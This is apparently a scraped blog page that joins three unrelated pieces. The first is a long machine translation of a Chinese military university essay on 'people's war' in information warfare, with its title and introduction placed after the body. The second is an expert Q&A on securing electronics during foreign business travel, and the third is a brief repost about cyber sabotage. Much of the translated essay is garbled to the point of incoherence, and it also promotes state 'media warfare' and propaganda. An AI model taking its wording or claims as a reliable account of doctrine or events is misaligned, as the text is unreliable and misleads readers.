Information warfare is one of the important features of the sudden outbreak of war increased, the process of shortening the war. Provoke a war party, in order to create a fait accompli and a more favorable situation, often with a sudden attack caught off guard the way to the other side to blow, and seeks to achieve a decisive victories in a short time. In addition, information warfare consumption increased dramatically, both sides are trying to combat a quick fix with little cost to achieve the purposes of war. In this case, change through sustained combat enemy forces greatly reduces the possibility. Therefore, the information warfare conduct civil wars, not only faced with how to release in a short test of the people’s war Weili, and the possibility of lasting defeat the enemy becomes negligible.     (Three) high-tech information warfare, and more in the sparsely populated border and coastal areas as well as sea and air for the masses traditional way of war frontline facing serious challenges     in the past war, a large scale because of the war and the relatively tech weaponry low, logistical and equipment support technical requirements are not high, coupled with the war mainly on land, ordinary people will be able to directly participate in a little training operations, delivering supplies to the front or to the way frontline. Therefore, human and human frontline war is war frontline people’s traditional way of war.    

 In the information war, the warring parties tend to use one or the most advanced aircraft, ships, tanks, artillery, missiles, and other cutting-edge technology, greatly improve the technical content of war, battle space from the past in order to develop a terrestrial land-based , sea, air, space, electricity multidimensional space to support security operations equipment and technical means of highly specialized equipment. In addition, information warfare unit time combat strength increases rapidly, fighting more intense, direct combatants psychological and physical quality put forward higher requirements. No rigorous professional training not only ordinary people cannot use advanced weapons and equipment and well-trained and have high-tech weapons of the enemy to make a direct confrontation, and even logistical and equipment support is difficult to carry out the task. Coupled with the war mostly in sparsely populated border and coastal areas as well as sea and air, greatly increased the masses direct war frontline of difficulty. Therefore, information warfare, the masses will direct the war, supporting the front of the main changes is indirect war, supporting the front main support for the war is also supported by the human and material resources into technology-based intelligence support based.    

(Four) Information warfare has undergone revolutionary change, and the traditional tactics of people’s war are facing severe challenges

In the long-term practice, the army formed a set of flexible strategies and tactics of people’s war, created numerous “survival of the fittest,” the war miracle. However, we should see that in the past we have conducted a people’s war, is the relatively low level of weaponry semi-mechanized warfare, the main battle, the battle is on the ground, thus forming the main form of combat – trench warfare, warfare and a series of guerrilla warfare and related, are conducive to our full advantage of the number of people. Especially in irregular warfare guerrilla warfare that, in the proportion of combat operations and the impact of the outcome of the war is relatively large.

Engels pointed out: “Once technological advances can be used for military purposes and has been used for military purposes, they will almost immediately forcibly, and often is a violation of the will of the commander of the changes caused by warfare or even revolution.”

With IT The rapid development of high-tech weapons and the widespread use of information warfare revolutionary change taking place. For example: Battlefield to the five-dimensional space development; missiles, electronic warfare, network warfare, and many other new combat styles have been in war; C4 ISR against the increasingly fierce battle to win control of information and operational command of the army to become the premise and focus; to become independent of combat raids, much warfare, night fighting, the proportion of firepower increases; emphasize more arms, a variety of weapons to combat the overall implementation of the integration of diverse, asymmetric, non-contact, non-linear operations become an important mode of combat, etc. and so on. In this case, the traditional to the Army mainly to ground-based battlefield warfare, warfare, guerrilla warfare combat forms and information warfare will be difficult to adapt to the requirements. For example, in past wars, melee midnight oil has been the army’s forte. But in the information war, faced with advanced surveillance technology and long-range precision strike weapons of the enemy, we will be faced with melee midnight oil does not rely on rope, unseen challenges, and even enemies in the night-side occupy a greater advantage.

 How to deal with the challenges of information warfare, the development of people’s war strategy and tactics, to carry out the people’s war to become an urgent problem. 

Second, information warfare still insist on carrying out the people’s war

(a) Information warfare does not change the inherent social and political attributes of war, still have to carry out the basic conditions of the people’s war

Since private ownership and class were produced, war has never left politics. Compared with previous wars, although the scale of information warfare, duration, and other aspects of weapons and equipment have undergone significant changes, showing a lot of new features, but the war itself has properties and not because of social and political development of warfare change.

Information warfare is still a continuation of politics, there is still justice and injustice of distinction, the nature of war and the people’s support or oppose the war are still often contributing factors, the basic conditions for the conduct of civil war, that the justice of the war and mass still exists.

The justice of the war is the political basis for the conduct of civil war, but also an important factor in the outcome of war. China’s socialist nature and a defensive national defense policy decisions for our future information warfare is necessarily oppose hegemonism and safeguarding national security and unity, the protection of national survival and development interests, building a moderately prosperous society to ensure the smooth conduct of the just war. The justice of this war is that we carry out in the information warfare solid political foundation for the people’s war is our war to win the final victory of the future fundamental guarantee.

War mass is the source of strength to win the victory. Our future of information warfare, represents the fundamental interests of the overwhelming majority of people just war, and thus be able to get the full support of the masses. Information warfare is a comprehensive national strength, is the political, economic, military, technological, diplomatic, cultural, social and psychological fronts, including the overall war. Although the majority of the people cannot direct a large scale as before the war, supporting the front, but they are in the war embodied the role of the masses through the comprehensive national strength of support and backing for the war action reflected. In this sense, the people and the comprehensive national strength, and is inextricably linked to the outcome of war in the vast masses of people, there remains a great power war deepest roots, as long as this kind of hidden among the great masses of the people forces play out, we can still win the information war.    

(Two) Information war did not change the outcome of the basic laws of war, the determinants of the outcome of war is still the person

Information warfare, the growing importance of weaponry, an advantage in weaponry easier to win the war party initiative and even war. However, no matter how the change in the form of war, the basic law of the outcome of war is constant, that is, people are the main body of the war, the determining factor is winning the war, weapons and equipment is an important factor in the decision outcome of the war.

In information warfare dominance and decisive role, not because of the extensive application of high-tech weaponry and all reduced. Engels long ago: “gun that he is not moving, you need to by a brave heart and a strong hand to use them.” Then advanced weaponry, once removed from the people, will lose its proper performance. U.S. Department of Defense submitted to the U.S. Congress in the Gulf War report: “Winning the war victory is people, not machines or technology.” Justice of the people’s war and mass decisions, our combatants are equipped with more high political consciousness and consciously contribute to achieve the purpose of the war, they better than the enemy weapons in the hands full performance.

 Practice shows that war, weaponry weaknesses, you can play to people’s subjective initiative to change. Person’s conscious activity, not only in understanding the dynamic laws of war, revealing the possibility of victory, the most important is to actively create conditions for the use of various means of victory possibility into reality. Information warfare unprecedented fierce, brutal, war scale and process more vulnerable to a variety of factors, which also enhances the role of people in the war. Weaponry at a disadvantage in the case, as long as the person’s subjective initiative into full play, relying on the excellent political and military qualities, based on the existing equipment, creating and choosing the right strategy and tactics to achieve the best combination of people and weapons, we will be able to superior weaponry against the enemy find ways to make up for the lack of weapons, and promote superior enemy on the battlefield transformed my bad posture, and ultimately win the war.    

(Three) The development of information technology has injected new vitality into carrying out the people’s war

In this world, things are always dialectical, we must address the information war against the people’s war presented challenges, while also saw rapid information technology development but also to carry people’s war has injected new vitality.

First, the rapid development of information technology, in order to build a strong people’s war potential to provide a new historical opportunity. Since the reform and opening up, Deng Xiaoping’s “Science and technology are primary productive forces” and Jiang Zemin’s “education” under the correct guidance of strategic thinking, China’s information technology as the representative of the rapid development of high-tech, cutting-edge technology in a number of breakthrough has been made, in biotechnology, computer technology, rocket technology, satellite communications technology, superconducting materials and other fields of research, has been close to or reach the world advanced level.

At present, the annual output value of China’s information industry to more than 2 times higher than the GDP growth rate for the overall national socio-economic structure of the increasing influence for the conduct of the people’s war has laid a relatively solid material and technological foundation.

Secondly, the rapid development of information technology, the war for the people supporting the front provides a new technical support. The level of development of science and technology determine the masses of the people to participate in and support the war, way, way. Although the material basis of information warfare and warfare has undergone a fundamental change, but the people on the course and outcome of the war has not reduced, but with the advancement of science and technology as well as improving the quality of people’s technology and growing. Compatible with the characteristics of modern high-tech military and civilian increasingly prominent in the current level of information of our military forces with a larger gap between the Western powers in the case, widely hidden in the masses of scientific and technological resources, will be the future of information warfare army survival of the fittest and the strong support necessary complement. As long as these potential technological forces in a planned, organized mobilization, we can effectively compensate for the overall military weaponry disadvantage, the formation of local areas, local battlefield technological advantages, to achieve survival of the fittest.

Finally, the development of information technology for innovative tactics to expand the people’s war, the new space. As Mao Zedong pointed out: “the world of things, always a thing down, there is one thing offensive, it also has a thing down. …… We believe that relying on the people, the world would not unassailable ‘magic’.” On the one hand, the information it has its advanced weaponry side, but there are also weaknesses and limitations. Especially advanced information technology structure is very large and complex weapons systems, it is difficult for all-round protection. In recent years, several global epidemic of vicious computer viruses caused huge losses for countries that modern information systems vulnerability proof. On the other hand, the development of information technology, people’s war for us to provide new technical means, expanding the innovative tactics of people’s war room.

In the past people’s war, we have to rely on relatively backward technology and weaponry, yet it can create a lot of strategy and tactics to defeat the enemy. Today, we already have in information technology for a foundation, but also for the specific characteristics of information warfare, transformation and creating new tactics, research and exploration play win the information war “trick.” 

Third, information warfare to carry out the people’s war Countermeasures

(a) Accelerate the development of comprehensive national strength, and lay a solid foundation of people’s war

Information warfare in the final analysis is a comprehensive national strength. Refers to a country’s comprehensive national strength have all the resources and material and spiritual strength, marking the country’s economic, political, technological, military, cultural and other aspects of the overall level of development. To carry out the people’s war winning the information war, you must have a strong comprehensive national strength. On China’s national conditions, in order to accelerate the development of comprehensive national strength, lay the foundation of people’s war, we must focus on grasping the following aspects:

First, to develop the economy. Economic strength of a country’s comprehensive national strength is an important indicator. Strong economic strength, winning the information war can lay a solid material foundation. Meanwhile, the economic strength is the material basis for the modernization of national defense, there are no certain economic forces for support, defense modernization will lose the foundation. Therefore, we must persist in taking economic construction as the center, concentrating on the development of social productive forces, the country’s overall economic construction to consciously obey.

 Second, in order to accelerate the development of high-tech information technology as the representative. On the one hand, science and technology to enhance the comprehensive national strength has a decisive, transformative role. In the current form of society by the industrialized to the process of information, who can seize the technology “commanding heights” and “frontier”, whoever may enhance the comprehensive national strength to win. On the other hand, science and technology are primary productive forces, but also the first combat, defense construction is inseparable from the support of advanced science and technology. Especially information technology compared to other technologies, the military and civilian compatibility stronger, the new information technologies emerging, in accelerating national and social information, but also for the military information construction provides a rare historical opportunity.    

Third, comprehensively promote the construction of military information, and constantly enhance military strength. After the war directly to the performance of military forces of the contest, to winning the information war is inseparable from a strong line with the requirements of the military information warfare. To seize the world’s new military revolution brought to the army building historic opportunity to accelerate weaponry leapfrog development, modernization of the means to achieve the people’s war; unswervingly implement the strategic project, training a large number of qualified military personnel; at all levels to strengthen joint and combined arms training to improve joint operational capabilities; according elite, synthesis, efficient principle, establish and perfect an appropriate scale, reasonable structure, organization lean, agile command of military system; study the characteristics of information warfare, innovation and the development of information warfare theory.    

Fourth, for the information war characteristics, strengthen national defense reserve forces. For information militia building should be the characteristics of high-tech warfare, and universality in keeping the masses on the basis of outstanding quality construction. Primary militia and militia on the distinction between ordinary and should not be confined to the age criteria, but to combine their technological quality measure. To further reduce the size of infantry units, focus on strengthening the missiles, artillery, communications, chemical defense, information and other high-tech special unit of the building. Reserve forces to comprehensively enhance the quality of construction, vigorously improve the rapid mobilization and the ability to carry out combat missions, narrowing the gap with the active forces fighting efforts to achieve the establishment of an appropriate scale, reasonable structure, compiled scientific, reliable and workable objectives reserve forces.    

Fifth, to carry out various forms of national defense education, improve national defense. The strength of the concept of national defense exhibit a country preparing for war ideological foundation is solid, countries in the world to enhance the national defense concept placed in improving comprehensive national strength in an important position. To adhere to the masses of people’s war, we must carry out effective, diverse forms of national defense education, so that the masses has always been to establish a strong national defense, information warfare is carried out in the people’s war to lay a solid ideological foundation.    

(Two) Features in-depth study of information warfare, development and innovation strategy and tactics of people’s war

Strategy and tactics of people’s war, is to carry out the soul of the people’s war. As the saying goes: “The Sword inferior to sword better than people.” In past wars, people’s war has been able to repeatedly create a “survival of the fittest” miracle, one of the important reasons is that we have a set of adjustable strategy and tactics. In the future for a long period of time, we will be at a disadvantage on the weaponry, and the traditional people’s war strategy and tactics as the development of warfare changes facing severe challenges, so winning the information war under conditions of people, must examine the characteristics of information warfare, development and innovation strategy and tactics of people’s war. Create new tactics in the development process, should focus grasp the following principles:

First, to establish and adapt to information warfare operational concepts. Since there has been no information warfare military practice, so in the process of creating new tactics, the concept of mechanized warfare vulnerable bondage. Therefore, the idea is to create new tactics update the premise that only break the shackles of old ideas, establish and adapt to information warfare operational concepts in order to provide a fresh perspective, with the correct way of thinking to create new tactics. For example: In the assessment of combat forces, we should abandon the labor-intensive, the number and scale of their concepts, technology-intensive, quality and efficiency concepts; choice of target in combat, to abandon the idea of annihilating the enemy’s effective strength-based, establish a centralized main forces to fight the enemy vital concept.

Second, pay attention to the traditional military tactics absorb nutrients. Information warfare is a new form of war, our military has created in the last war tactics, may not apply to today’s wars, and some tactics need to abandon, and some need to be improved. We study and research the traditional tactics of war, not in the future information warfare copy of these tactics, but to learn the older generation of revolutionaries, military strategist creating new tactics stand, viewpoint and method. This is our future development and creating new tactics and source of wisdom. For example, in China’s Revolutionary War created a “concentrate superior forces to fight a war of annihilation” of war, in the information war, as a means of long-range precision strike extensive use of the practice of concentration of forces no longer feasible. However, we should understand the tactics of Mao Zedong created the spiritual essence, that the enemy superior in the case of my poor, through a certain method, the local formation of the war situation in who wins. This idea is still in the information war has important guiding significance. We can use this as a guide, according to the specific characteristics of information warfare, the development of the traditional tactics to “concentrate superior firepower to fight the enemy vital” new tactics.    

Third, the combination of the actual record of our military tactics. Creating new tactics, not behind closed doors, not on paper, must be combined with the actual situation of our army. Currently, the army is actually the largest in weaponry compared with the developed countries there is still a big gap, though they have some advanced weaponry, but still in a lot of low-tech equipment. Which determine our tactics neither copying Western countries of war, in order to avoid committing “Porgy and dragon than treasure” low-level errors, nor imagined, impractical so-called “new tactics.” Measure one kind of tactics is correct or not, not to see how its name sounds good, how novel methods, means, how advanced the key depends on whether it is really effective in combat. Enhance the value of research tactics, is that correct tactics to make up the gap weaponry to achieve superior weaponry with inferior equipment to defeat the purpose of the enemy. We should adhere to the “you hit, I hit my”, the focus on tactical innovation to existing equipment on high-tech enemy and seize enemy weapons and equipment information some of the weaknesses, give full play to existing weapons equipment performance, and strive to me for so long, and strike the enemy’s weaknesses, research, and create a “soil”, “foreign” combination of low high school weaponry combined tactics.

(Three) To establish a sound mechanism for rapid mobilization of national defense, to ensure the people’s war potential for rapid accumulation and transformation of information warfare to carry out the people’s war, faced with the short duration of the war and the people gathered the forces of war and transformation contradiction between the relatively long time. To resolve this conflict, we must establish a sound mechanism for rapid mobilization of national defense.
The range includes the formation of rapid military expansion and expand quickly, persons and goods transport and complement fast, fast track to a wartime economy, the restructuring of the industrial structure and expand military production and fast; rapid mobilization mechanism of this standard is to be able to adapt to the information sudden outbreak of the war, the war is characterized by short duration, so that the potential of the people’s war in a very short time and quickly gathered quickly converted into national defense capabilities. Establishment of mechanisms for rapid mobilization of national defense, for the power of the people’s war play, winning the information war has very important significance. 

Rapid mobilization mechanism must have the following elements:

First, clear objectives and tasks. Should be included in national defense mobilization of economic and social development plans, incorporating national defense and army building master plan, clearly defined stages at different times under different circumstances and people’s armed mobilization, economic mobilization, civil air defense mobilization and mobilization readiness transportation and other aspects of the target with the task.

Second, laws and regulations are complete. On the mobilization of rights and obligations, rewards and penalties, responsibilities and benefits should be based on the laws and regulations in the form of regulations, the mobilization of all aspects of the various aspects and rule-based, law.

Third, the mobilization plan carefully. Troops, economy, transportation, civil air defense, telecommunications, health and other aspects of the mobilization of both careful planning in order to prepare for mobilization in peacetime, wartime mobilization provide the basis for implementation. Army and local levels, according to the national mobilization plan to develop this level of mobilization plans and safeguards.

Fourth, science and technology to mobilize prominent position. In information warfare launched the people’s war, the way people’s war frontline war intelligence and intelligence is mainly supporting the front, which determines the future of science and technology for national defense mobilization will be the prominent content.    

Fifth, the formal procedures quickly and efficiently. According to the characteristics of information warfare, military departure from China’s national conditions, to establish a war in the war potential into the strength of the effective ways and methods. For example, the expansion of the armed forces, civilian products, converting, transportation capacity for the acquisition, implementation of civil air defense, compensation for economic losses as well as other financial and material resources mobilization, should form a set of rapid and effective mobilization of forms and procedures, so that the people’s war bringing power and conversion speed can meet the requirement of information warfare.    

(Four) Combining various approaches to play the overall power of the people’s war

In revolutionary war in the past, an important part of people’s war, is dominated by the armed struggle, the combination of a variety of forms of struggle to play the overall power of the people’s war. In information warfare, military struggle and political, economic, diplomatic, cultural, ideological struggles fields more closely intertwined, in some cases even non-dominant armed struggle. Therefore, adherence to the combination of a variety of forms of struggle, for winning the information war has a more important significance.

 In information warfare, military by political factors more prominent political and military action, strong policy, and even a small tactical actions may be related to the overall strategic situation in the international community have a broad impact. Therefore, the information warfare conduct civil wars, on the one hand to make war all soldiers and civilians establish the overall concept of policy ideas, with significant international influence in the issue, in relation to the overall operations, ensure that the needs of the military and political obedience. On the other hand struggle in the UN and other international arena widespread publicity, win public support, and strive to get politically active.    

Information warfare increasingly focused on economic efficiency, greater dependence on the economy. In the rapidly growing trend of economic globalization, the case of economic blockade, economic sanctions would weaken the enemy’s comprehensive national strength is an important initiative, and to combat the economic center of the enemy, the better to play a drastic effect. During the Gulf War, the Kosovo War and the war in Iraq, the United States launched the war before the war and implementation process, are complemented by economic sanctions.

It is foreseeable that in the information war, economic sanctions and counter-sanctions, blockade and counter-blockade as a primary means of economic sectors will be fierce struggle to become another battlefield of information warfare. We conduct information warfare people’s war, on the one hand to use economic means of struggle, economic base and destroy the enemy’s ability to regenerate, maximize the economic loss to the enemy, eroding its war potential; hand to mobilize kind of strength, positive and effective implementation of economic protection, maintaining the normal operation of the national economy, efforts to develop production, economic development, for the victory of the war to lay a solid material foundation.

Any one country to war are very focused use of diplomatic means to secure more state support to maximize isolate each other, give each other causing huge political and moral pressure. Even superpowers also paid great attention to diplomacy with military struggle. In information warfare launched the people’s war, of course, but also actively through diplomatic struggle to establish a broad international united front.

Reform and opening up, China has actively conducted exchanges and cooperation in the international political, economic, cultural and other fields has played an active and important role in the international community to establish a peace-loving, maintain stability, to just and responsible handling of international affairs the image of a big country, it’s all for us in the information warfare fruitful diplomatic struggle to create the conditions. In the information war, we want to make good use of all kinds of contradictions, give full play to all efforts conducive to my various international factors. To take full advantage of the favorable as a permanent member of the UN’s international status, to consolidate and expand the role of the United Nations, especially the UN Security Council in dealing with the leading role of international security to thwart any so-called international intervention against our country; give full play and the developing countries consistent with the fundamental interests of political advantage, and properly handle the relationship with the countries concerned, differentiation enemy’s allies; pay attention and have a special country with the same or equivalent national strategic interests of the military establishment of some form of collaboration or partnership, the strategic formation of a certain degree of cooperation and coordinate mechanisms. 

As long as we are able to unite all forces that can be united, to win the support of as many countries as to maximize isolate and attack the enemy, you can establish a broad international united front for the victory to carry out the people’s war to create a favorable international environment.

Information warfare, media warfare, warfare has become increasingly important. In the field of public opinion and propaganda, should make full use of newspapers, television, radio, Internet, multimedia and other traditional and non-traditional media, the Western developed countries of the world and strive to break the monopoly of public opinion, crushing hostile nations attempt to demonize the image of our country, torn hegemony doctrine of “human rights”, “humanitarian aid”, “democracy” and so gorgeous packaging, with true, correct public opinion supported the war inspired the masses of enthusiasm and self-consciousness, for the support of the international community on China.

 In the legal battle field, we should make good use of existing international law, to carry out the people’s war for me to provide a legal basis to prevent the enemy to international law as an excuse for me to intervene and wage war, but also to actively participate in international law and various international mechanisms the development and establishment, to prevent the establishment of prejudicial interests of our country, is conducive to hostile forces and international mechanisms of international law, but also to strengthen domestic legislation in the field work, so that hostile forces without loopholes. At the same time, pay attention to the psychological protection, encouraging all people to fight, winning the information war and build a strong psychological defense. 


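Reflections on the Challenges and Countermeasures of Conducting People’s War in Information Warfare

Strategy Teaching and Research Office, National Defense University

Chinese People’s Liberation Army

General Staff Department

People’s war is our army’s traditional magic weapon for defeating the enemy. Since the 1990s, with the vigorous rise of the world’s new military revolution and the wide use of high-tech weapons in war, the form of war has begun to change from mechanized warfare to information warfare, and it has become a consensus that information warfare will be the main form of war in the 21st century. How the thinking of people’s war, formed and developed in semi-mechanized and mechanized warfare, should face the challenges brought by information warfare, how it can continue to exert its unique advantages in information warfare, and how to ensure victory in wars that may occur in the future is a major theoretical question and an urgent practical question before us.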

   

Ask the Experts: Travel Abroad with Electronics

This time around, a reader wrote in with a very common question:

Q: “A member of my management team is about to go on a business trip to a country with known cyber-spying capabilities. She wants to take her phone, tablet and laptop so she can be productive on the road. What can I do to make this safer for her and our organization without restricting her work capability on the road in an unreasonable manner?”

Adam Hostetler opened with: 

The standard here is don’t bring anything electronic, if you can help it. In most cases, that’s not probable, so don’t bring your normal personal phones or laptops; no smartphone at all is advisable. Bring loaner devices that have only exactly what they need and can be burned when they get back. Only connect through a VPN, and have that account monitored on the other end. Don’t leave a phone or laptop in a hotel room, even in the safe, and don’t talk business there either.

Jim Klun added:

There is likely no way to do this without restricting – or at least significantly changing – the way she works. 

It has to be assumed that any information on her personal devices will be compromised. 
It also can be assumed that any information flowing between her devices and the outside world will be compromised. 

I would recommend two things:

1. Take only what you can afford to lose. Communicate only what you can afford to lose.

   So – take a small number of devices (e.g., phone, laptop) minimally configured with only that information absolutely required for this trip.
   Better to have corporate staff respond to email requests from her rather than to allow access to critical corporate resources from a suspect location.
   If internal connectivity to corporate resources must be allowed (e.g., VPN), it should ideally require 2-factor auth of some sort, use strong encryption, and grant access only to a limited subset of resources.
   All credentials can be assumed to be lost – hence the utility of two-factor. All of the employee’s credentials should be changed on return.

   All devices brought back should be assumed to be compromised and will need complete re-imaging.

2. Consider creating “go-kits” and well-defined repeatable processes for employees who travel to such locations.

   A special set of devices (laptop, phone, etc.) that are minimally configured and can be wiped on return. No personally owned devices should be allowed.
   Connectivity for those devices – if absolutely needed – that allows access only to a tightly restricted and monitored subset of internal corporate resources.
   Most importantly – training for employees who make these trips. The employee must understand the special risks being incurred and be aware of their responsibility to protect the company and the company’s existing customers.
   As above – all of the employee’s credentials should be changed on return.

Bill Hagestad summed it up with this: 

This one is near and dear to my heart…I call these rules of counter cyber espionage the  李侃如的中國旅遊規則 (Lieberthal’s China Travel Rules)

Cellphone and laptop @ home brings “loaner” devices, erased before he leaves home country & wiped clean immediately upon returns;

In China, disable Bluetooth & Wi-Fi, phone never out of his sight;

In meetings, not only turn off his phone but also remove battery, microphone could be turned on remotely;

Connect to the Internet only via encrypted, password-protected channel, copies & pastes his password from a USB thumb drive;

Never type in a password directly, “the Chinese are very good at installing key-logging software on your laptop.”

The article can be found @ http://www.nytimes.com/2012/02/11/technology/electronic-security-a-worry-in-an-age-of-digital-espionage.html?pagewanted=all

Brent Huston closed with:

Any electronic items they do take on the road with them should be current on patches, AV signatures and detection capabilities. All data, drives, systems, etc. should be strongly encrypted when possible to do so (Pay special attention to export restrictions on crypto depending on where they are going.) Also, turn and burn EVERYTHING when they come back. Treat all media and data obtained during the travel as suspicious or malicious in nature. Trojans of data and documents are common (and usually they scan as clean with common tools). This is especially true for high value targets and critical infrastructure clients. Trust us! Safe travels! 


Cyberattacks on Rise Against U.S. Corporations

See on Scoop.it: Chinese Cyber Code Conflict

Officials said the aim in a new wave of attacks was not espionage but sabotage, and that the source seemed to be in the Middle East.

Red-DragonRising’s insight:

ICS-CERT issued this alert that cyber attacks are now trending towards sabotage instead of cyber espionage…combine cyber jihadist activity, e.g., Shamoon, with cyber criminality and you have a very potent and volatile mix directly impacting and affecting both commercial enterprises and the United States critical infrastructure…

 

Standby to standby…

Semper Fi,

Thank you

紅龍 (Red Dragon)

See on www.nytimes.com